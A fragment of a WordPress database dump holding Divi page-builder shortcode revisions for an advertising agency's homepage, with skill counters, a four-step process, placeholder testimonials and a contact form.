button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"4.4.9\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.1\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>We have a dedicated team to build new tools and technique, to complete the day today repetitive work with precision.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It is a long established fact that a reader. It was popularised in the 1960s with the release.\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#d4b068\" use_percentages=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Lead/Sales Generation Campaign - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Digital Advertising - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"4.5.2\" background_color_gradient_direction=\"90deg\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/Artboard-4.png\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-Copy-12.png\" alt=\"Best Advertising agency\" title_text=\"best advertising agency\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"4.5.2\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]<p>NOBODY READS ADS, PEOPLE READ WHAT INTERESTS THEM &amp; SOMETIME IT\'S AN AD</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px||3px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Easy to start</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-216\">\n<p><strong><em>Just four steps</em></strong></p>\n<p><strong><em></em></strong></p>\n</div>\n<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-217\">\n<p>We had adopted proven workflow to produce consistent result, but never hesitate to cross the lines and work differently.</p>\n</div>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px|4px|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"01. BRAND AUDIT\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<p style=\"text-align: center;\"><span>Analyzing the brand with all the key parameter (As per operating environment and competition)</span></p>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"02. STRATEGY\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||26px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<p><span>Starting with the summary of the plan, Defining TG, Writing/Creating USP</span></p>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px||||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"03. EXECUTION\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<div><span>Creative Development, Setting up the visual identity, implementing the IMC(Integrated Marketing Communication)</span></div>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"04. EVALUATION\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||43px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<div dir=\"ltr\"><span>The fourth but the most important step is evaluation, adaptation and reporting. To improvise future performance.</span></div>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-5.jpg\" alt=\"marketing strategy\" title_text=\"marketing strategy\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"50px||50px|||\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]<p>Best Advertising Is Done By Satisfied Customers. We Believe &amp; Nurture It In Our Business.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_padding=\"50px||50px||false|false\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form email=\"dhiraj@wthtest1.in8.cdn-alpha.com\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.4.9\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" fullwidth_field=\"on\" _builder_version=\"4.4.9\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.4.9\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','134-revision-v1','','','2020-08-07 11:56:23','2020-08-07 11:56:23','',134,'https://wthtest1.in8.cdn-alpha.com/2020/08/07/134-revision-v1/',0,'revision','',0),(466,1,'2020-08-07 12:08:32','2020-08-07 12:08:32','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.2\" background_color=\"#fcd21d\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/Desktop-HD-1024x728-1.png\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_margin=\"|auto|1px|auto||\" custom_padding=\"50px||50px|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>[/et_pb_text][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.9\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"zoom\" animation_duration=\"1200ms\" box_shadow_style=\"preset2\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Service Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"56px||110px|||\" custom_padding_tablet=\"20px||||false|false\" custom_padding_phone=\"12px||40px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" 